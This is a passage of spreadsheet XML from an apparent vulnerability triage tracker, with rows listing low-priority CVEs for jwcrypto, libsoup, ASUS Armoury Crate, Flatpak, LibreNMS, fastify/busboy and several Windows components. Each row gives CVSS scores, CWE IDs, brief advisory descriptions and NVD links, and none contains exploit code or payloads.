/><c r="Q1824" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R1824" s="5" t="inlineStr"><is><t>A flaw was found in the jwcrypto library, which is used for implementing Javascript Object Signing and Encryption (JOSE) standards. The issue occurs when the library verifies a General JSON Serialization JWS using a set of keys. Due to a coding error, the library fails to correctly identify the specific key ID (kid) and may instead accept a signature made by any valid key in the set. This can allow an attacker with a valid key to bypass authorization checks in applications that rely on the key ID to identify specific tenants or users.</t></is></c><c r="S1824" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84185</t></is></c></row><row r="1825"><c r="A1825" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1825" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1825" s="5" t="inlineStr"><is><t>CVE-2026-85534</t></is></c><c r="D1825" s="5" t="n"><v>5.9</v></c><c r="E1825" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1825" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1825" s="5" t="inlineStr" /><c r="H1825" s="5" t="n"><v>0.003</v></c><c r="I1825" s="5" t="inlineStr" /><c r="J1825" s="5" t="inlineStr" /><c r="K1825" s="5" t="inlineStr" /><c r="L1825" s="5" t="inlineStr" /><c r="M1825" s="5" t="inlineStr" /><c r="N1825" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1825" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1825" s="5" t="inlineStr" /><c r="Q1825" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1825" s="5" t="inlineStr"><is><t>A flaw was found in libsoup. When a client sends an HTTP/2 request body from a non-pollable input stream, the library can buffer more data than the current flow-control window later allows. A malicious HTTP/2 server can shrink SETTINGS_INITIAL_WINDOW_SIZE while that buffered read is still in progress. The client then copies the full buffer into a smaller DATA callback without a runtime bounds check, which can abort the process or fail the HTTP/2 session.</t></is></c><c r="S1825" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85534</t></is></c></row><row r="1826"><c r="A1826" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1826" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1826" s="5" t="inlineStr"><is><t>CVE-2026-16005</t></is></c><c r="D1826" s="5" t="n"><v>5.8</v></c><c r="E1826" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1826" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1826" s="5" t="inlineStr" /><c r="H1826" s="5" t="n"><v>0.001</v></c><c r="I1826" s="5" t="inlineStr" /><c r="J1826" s="5" t="inlineStr" /><c r="K1826" s="5" t="inlineStr" /><c r="L1826" s="5" t="inlineStr" /><c r="M1826" s="5" t="inlineStr" /><c r="N1826" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1826" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1826" s="5" t="inlineStr" /><c r="Q1826" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="R1826" s="5" t="inlineStr"><is><t>Release of Invalid Pointer or Reference in Armoury Crate driver allows a local user to free arbitrary memory via a crafted IOCTL request by bypassing the driver's verification, which can corrupt data structures and cause a system crash (BSOD).Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1826" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16005</t></is></c></row><row r="1827"><c r="A1827" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1827" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1827" s="5" t="inlineStr"><is><t>CVE-2026-69559</t></is></c><c r="D1827" s="5" t="n"><v>5.8</v></c><c r="E1827" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1827" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1827" s="5" t="inlineStr" /><c r="H1827" s="5" t="n"><v>0.003</v></c><c r="I1827" s="5" t="inlineStr" /><c r="J1827" s="5" t="inlineStr" /><c r="K1827" s="5" t="inlineStr" /><c r="L1827" s="5" t="inlineStr" /><c r="M1827" s="5" t="inlineStr" /><c r="N1827" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1827" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1827" s="5" t="inlineStr" /><c r="Q1827" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="R1827" s="5" t="inlineStr"><is><t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1827" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t></is></c></row><row r="1828"><c r="A1828" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1828" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1828" s="5" t="inlineStr"><is><t>CVE-2026-74866</t></is></c><c r="D1828" s="5" t="n"><v>5.8</v></c><c r="E1828" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1828" s="5" t="inlineStr"><is><t>ce714d77-add3-4f53-aff5-83d477b104bb</t></is></c><c r="G1828" s="5" t="inlineStr" /><c r="H1828" s="5" t="n"><v>0.002</v></c><c r="I1828" s="5" t="inlineStr" /><c r="J1828" s="5" t="inlineStr" /><c r="K1828" s="5" t="inlineStr"><is><t>fastify:fastify\/busyboy</t></is></c><c r="L1828" s="5" t="inlineStr" /><c r="M1828" s="5" t="inlineStr" /><c r="N1828" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1828" s="5" t="inlineStr"><is><t>2026-08-21</t></is></c><c r="P1828" s="5" t="inlineStr" /><c r="Q1828" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R1828" s="5" t="inlineStr"><is><t>@fastify/busboy is a multipart form-data parser for Node.js. Its multipart part-header parser splits header lines only on the two-byte carriage-return line-feed sequence, so a lone carriage return or line feed embedded in a part header is not treated as a line break and is carried verbatim into the parsed Content-Disposition filename and field name handed to the application. An attacker who uploads a file whose filename or field name contains a bare carriage return or line feed can inject control characters into consumers that trust the parser to return clean values, enabling filesystem filename pollution, log forging, or header injection when the value is forwarded to a carriage-return-sensitive sink. All versions of @fastify/busboy up to and including 3.2.1 are affected. The issue is fixed in version 3.2.2, which rejects any header line that still contains a bare carriage return or line feed. Users should upgrade to 3.2.2, and consumers such as @fastify/multipart should bump their @fastify/busboy dependency to pull in the fix.</t></is></c><c r="S1828" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74866</t></is></c></row><row r="1829"><c r="A1829" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1829" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1829" s="5" t="inlineStr"><is><t>CVE-2026-75811</t></is></c><c r="D1829" s="5" t="n"><v>5.8</v></c><c r="E1829" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1829" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1829" s="5" t="inlineStr" /><c r="H1829" s="5" t="n"><v>0.001</v></c><c r="I1829" s="5" t="inlineStr" /><c r="J1829" s="5" t="inlineStr" /><c r="K1829" s="5" t="inlineStr" /><c r="L1829" s="5" t="inlineStr" /><c r="M1829" s="5" t="inlineStr" /><c r="N1829" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1829" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1829" s="5" t="inlineStr" /><c r="Q1829" s="5" t="inlineStr"><is><t>CWE-1256</t></is></c><c r="R1829" s="5" t="inlineStr"><is><t>Improper Restriction of Software Interfaces to Hardware Features in ASUS Armoury Crate allows a local user to modify hardware configuration settings and potentially cause hardware damage by bypassing driver authentication and accessing critical model-specific registers.Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1829" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75811</t></is></c></row><row r="1830"><c r="A1830" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1830" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1830" s="5" t="inlineStr"><is><t>CVE-2026-76925</t></is></c><c r="D1830" s="5" t="n"><v>5.8</v></c><c r="E1830" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1830" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1830" s="5" t="inlineStr" /><c r="H1830" s="5" t="n"><v>0.001</v></c><c r="I1830" s="5" t="inlineStr" /><c r="J1830" s="5" t="inlineStr" /><c r="K1830" s="5" t="inlineStr" /><c r="L1830" s="5" t="inlineStr" /><c r="M1830" s="5" t="inlineStr" /><c r="N1830" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1830" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1830" s="5" t="inlineStr" /><c r="Q1830" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1830" s="5" t="inlineStr"><is><t>A flaw was found in Flatpak. A Time-of-check to time-of-use (TOCTOU) race condition exists in the `org.freedesktop.Flatpak.SystemHelper` component. This vulnerability occurs because a privileged `chmod` operation executes before the OSTree repository validation within the `Deploy()` function. An attacker can exploit this timing window to redirect symlinks to arbitrary files, potentially leading to unauthorized file manipulation or information disclosure.</t></is></c><c r="S1830" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76925</t></is></c></row><row r="1831"><c r="A1831" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1831" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1831" s="5" t="inlineStr"><is><t>CVE-2026-84193</t></is></c><c r="D1831" s="5" t="n"><v>5.8</v></c><c r="E1831" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1831" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1831" s="5" t="inlineStr" /><c r="H1831" s="5" t="n"><v>0.003</v></c><c r="I1831" s="5" t="inlineStr" /><c r="J1831" s="5" t="inlineStr" /><c r="K1831" s="5" t="inlineStr" /><c r="L1831" s="5" t="inlineStr" /><c r="M1831" s="5" t="inlineStr" /><c r="N1831" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1831" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1831" s="5" t="inlineStr" /><c r="Q1831" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1831" s="5" t="inlineStr"><is><t>LibreNMS through 26.2.0 contains a stored cross-site scripting vulnerability in legacy PHP template pages that render unescaped SNMP-sourced data fields including BGP peer descriptions, VRF names, process information, and SLA tags. Attackers with device management access or network access to enroll a rogue SNMP device can inject malicious JavaScript that executes when admins view affected routing and device pages, enabling credential theft and CSRF token exfiltration.</t></is></c><c r="S1831" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84193</t></is></c></row><row r="1832"><c r="A1832" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1832" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1832" s="5" t="inlineStr"><is><t>CVE-2026-16006</t></is></c><c r="D1832" s="5" t="n"><v>5.7</v></c><c r="E1832" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1832" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1832" s="5" t="inlineStr" /><c r="H1832" s="5" t="n"><v>0.001</v></c><c r="I1832" s="5" t="inlineStr" /><c r="J1832" s="5" t="inlineStr" /><c r="K1832" s="5" t="inlineStr" /><c r="L1832" s="5" t="inlineStr" /><c r="M1832" s="5" t="inlineStr" /><c r="N1832" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1832" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1832" s="5" t="inlineStr" /><c r="Q1832" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1832" s="5" t="inlineStr"><is><t>Exposure of Sensitive System Information to an Unauthorized Control Sphere in Armoury Crate driver allows a local user to obtain kernel virtual addresses via a crafted IOCTL request by bypassing the driver's verification, potentially providing further insight into the kernel memory layout.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1832" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16006</t></is></c></row><row r="1833"><c r="A1833" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1833" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1833" s="5" t="inlineStr"><is><t>CVE-2026-18023</t></is></c><c r="D1833" s="5" t="n"><v>5.7</v></c><c r="E1833" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1833" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1833" s="5" t="inlineStr" /><c r="H1833" s="5" t="n"><v>0.001</v></c><c r="I1833" s="5" t="inlineStr" /><c r="J1833" s="5" t="inlineStr" /><c r="K1833" s="5" t="inlineStr" /><c r="L1833" s="5" t="inlineStr" /><c r="M1833" s="5" t="inlineStr" /><c r="N1833" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1833" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1833" s="5" t="inlineStr" /><c r="Q1833" s="5" t="inlineStr"><is><t>CWE-226</t></is></c><c r="R1833" s="5" t="inlineStr"><is><t>Sensitive Information in Resource Not Removed Before Reuse in ASUS Armoury Crate driver allows a local user to disclose sensitive information from uninitialized memory via a crafted IOCTL request that bypasses the driver's security verification mechanism.
Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S1833" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18023</t></is></c></row><row r="1834"><c r="A1834" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1834" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1834" s="5" t="inlineStr"><is><t>CVE-2026-68874</t></is></c><c r="D1834" s="5" t="n"><v>5.7</v></c><c r="E1834" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1834" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1834" s="5" t="inlineStr" /><c r="H1834" s="5" t="n"><v>0.008</v></c><c r="I1834" s="5" t="inlineStr" /><c r="J1834" s="5" t="inlineStr" /><c r="K1834" s="5" t="inlineStr" /><c r="L1834" s="5" t="inlineStr" /><c r="M1834" s="5" t="inlineStr" /><c r="N1834" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1834" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1834" s="5" t="inlineStr" /><c r="Q1834" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1834" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1834" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t></is></c></row><row r="1835"><c r="A1835" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1835" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1835" s="5" t="inlineStr"><is><t>CVE-2026-69317</t></is></c><c r="D1835" s="5" t="n"><v>5.7</v></c><c r="E1835" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1835" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1835" s="5" t="inlineStr" /><c r="H1835" s="5" t="n"><v>0.008</v></c><c r="I1835" s="5" t="inlineStr" /><c r="J1835" s="5" t="inlineStr" /><c r="K1835" s="5" t="inlineStr" /><c r="L1835" s="5" t="inlineStr" /><c r="M1835" s="5" t="inlineStr" /><c r="N1835" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1835" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1835" s="5" t="inlineStr" /><c r="Q1835" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1835" s="5" t="inlineStr"><is><t>Out-of-bounds read in Remote Desktop Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1835" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69317</t></is></c></row><row r="1836"><c r="A1836" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1836" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1836" s="5" t="inlineStr"><is><t>CVE-2026-69349</t></is></c><c r="D1836" s="5" t="n"><v>5.7</v></c><c r="E1836" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1836" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1836" s="5" t="inlineStr" /><c r="H1836" s="5" t="n"><v>0.008</v></c><c r="I1836" s="5" t="inlineStr" /><c r="J1836" s="5" t="inlineStr" /><c r="K1836" s="5" t="inlineStr" /><c r="L1836" s="5" t="inlineStr" /><c r="M1836" s="5" t="inlineStr" /><c r="N1836" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1836" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1836" s="5" t="inlineStr" /><c r="Q1836" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R1836" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1836" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t></is></c></row><row r="1837"><c r="A1837" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1837" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1837" s="5" t="inlineStr"><is><t>CVE-2026-69372</t></is></c><c r="D1837" s="5" t="n"><v>5.7</v></c><c r="E1837" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1837" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1837" s="5" t="inlineStr" /><c r="H1837" s="5" t="n"><v>0.008</v></c><c r="I1837" s="5" t="inlineStr" /><c r="J1837" s="5" t="inlineStr" /><c r="K1837" s="5" t="inlineStr" /><c r="L1837" s="5" t="inlineStr" /><c r="M1837" s="5" t="inlineStr" /><c r="N1837" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1837" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1837" s="5" t="inlineStr" /><c r="Q1837" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1837" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t></is></c><c r="S1837" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t></is></c></row><row r="1838"><c r="A1838" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1838" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1838" s="5" t="inlineStr"><is><t>CVE-2026-69393</t></is></c><c r="D1838" s="5" t="n"><v>5.7</v></c><c r="E1838" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1838" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1838" s="5" t="inlineStr" /><c r="H1838" s="5" t="n"><v>0.008</v></c><c r="I1838" s="5" t="inlineStr" /><c r="J1838" s="5" t="inlineStr" /><c r="K1838" s="5" t="inlineStr" /><c r="L1838" s="5" t="inlineStr" /><c r="M1838" s="5" t="inlineStr" /><c r="N1838" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1838" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1838" s="5" t="inlineStr" /><c r="Q1838" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1838" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1838" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t></is></c></row><row r="1839"><c r="A1839" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1839" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1839" s="5" t="inlineStr"><is><t>CVE-2026-69405</t></is></c><c r="D1839" s="5" t="n"><v>5.7</v></c><c r="E1839" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1839" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1839" s="5" t="inlineStr" /><c r="H1839" s="5" t="n"><v>0.006</v></c><c r="I1839" s="5" t="inlineStr" /><c r="J1839" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1839" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1839" s="5" t="inlineStr" /><c r="M1839" s="5" t="inlineStr" /><c r="N1839" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1839" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1839" s="5" t="inlineStr" /><c r="Q1839" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R1839" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="S1839" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t></is></c></row><row r="1840"><c r="A1840" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1840" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1840" s="5" t="inlineStr"><is><t>CVE-2026-69416</t></is></c><c r="D1840" s="5" t="n"><v>5.7</v></c><c r="E1840" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1840" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1840" s="5" t="inlineStr" /><c r="H1840" s="5" t="n"><v>0.006</v></c><c r="I1840" s="5" t="inlineStr" /><c r="J1840" s="5" t="inlineStr" /><c r="K1840" s="5" t="inlineStr" /><c r="L1840" s="5" t="inlineStr" /><c r="M1840" s="5" t="inlineStr" /><c r="N1840" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1840" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1840" s="5" t="inlineStr" /><c r="Q1840" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1840" s="5" t="inlineStr"><is><t>Buffer over-read in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="S1840" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69416</t></is></c></row><row r="1841"><c r="A1841" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1841" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1841" s="5" t="inlineStr"><is><t>CVE-2026-69507</t></is></c><c r="D1841" s="5" t="n"><v>5.7</v></c><c r="E1841" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1841" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1841" s="5" t="inlineStr" /><c r="H1841" s="5" t="n"><v>0.008</v></c><c r="I1841" s="5" t="inlineStr" /><c r="J1841" s="5" t="inlineStr" /><c r="K1841" s="5" t="inlineStr" /><c r="L1841" s="5" t="inlineStr" /><c r="M1841" s="5" t="inlineStr" /><c r="N1841" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1841" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1841" s="5" t="inlineStr" /><c r="Q1841" s="5" t="inlineStr"><is><t>CWE-538</t></is></c><c r="R1841" s="5" t="inlineStr"><is><t>Insertion of sensitive information into externally-accessible file or directory in Microsoft Windows Search Component allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1841" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69507</t></is></c></row><row r="1842"><c r="A1842" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1842" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1842" s="5" t="inlineStr"><is><t>CVE-2026-69552</t></is></c><c r="D1842" s="5" t="n"><v>5.7</v></c><c r="E1842" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1842" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1842" s="5" t="inlineStr" /><c r="H1842" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1842" s="5" t="inlineStr" /><c r="J1842" s="5" t="inlineStr" /><c r="K1842" s="5" t="inlineStr" /><c r="L1842" s="5" t="inlineStr" /><c r="M1842" s="5" t="inlineStr" /><c r="N1842" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1842" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1842" s="5" t="inlineStr" /><c r="Q1842" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="R1842" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Windows Print Spooler Components allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1842" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69552</t></is></c></row><row r="1843"><c r="A1843" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1843" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1843" s="5" t="inlineStr"><is><t>CVE-2026-69569</t></is></c><c r="D1843" s="5" t="n"><v>5.7</v></c><c r="E1843" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1843" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1843" s="5" t="inlineStr" /><c r="H1843" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1843" s="5" t="inlineStr" /><c r="J1843" s="5" t="inlineStr" /><c r="K1843" s="5" t="inlineStr" /><c r="L1843" s="5" t="inlineStr" /><c r="M1843" s="5" t="inlineStr" /><c r="N1843" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1843" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1843" s="5" t="inlineStr" /><c r="Q1843" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R1843" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Print Spooler Components allows an authorized attacker to deny service over a network.</t></is></c><c r="S1843" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69569</t></is></c></row><row r="1844"><c r="A1844" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1844" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1844" s="5" t="inlineStr"><is><t>CVE-2026-69572</t></is></c><c r="D1844" s="5" t="n"><v>5.7</v></c><c r="E1844" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1844" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1844" s="5" t="inlineStr" /><c r="H1844" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1844" s="5" t="inlineStr" /><c r="J1844" s="5" t="inlineStr" /><c r="K1844" s="5" t="inlineStr" /><c r="L1844" s="5" t="inlineStr" /><c r="M1844" s="5" t="inlineStr" /><c r="N1844" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1844" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1844" s="5" t="inlineStr" /><c r="Q1844" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1844" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1844" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69572</t></is></c></row><row r="1845"><c r="A1845" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1845" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1845" s="5" t="inlineStr"><is><t>CVE-2026-69591</t></is></c><c r="D1845" s="5" t="n"><v>5.7</v></c><c r="E1845" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1845" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1845" s="5" t="inlineStr" /><c r="H1845" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1845" s="5" t="inlineStr" /><c r="J1845" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1845"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845" s="5" t="inlineStr" /><c r="M1845" s="5" t="inlineStr" /><c r="N1845" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1845" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1845" s="5" t="inlineStr" /><c r="Q1845" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1845" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1845" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69591</t></is></c></row><row r="1846"><c r="A1846" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1846" 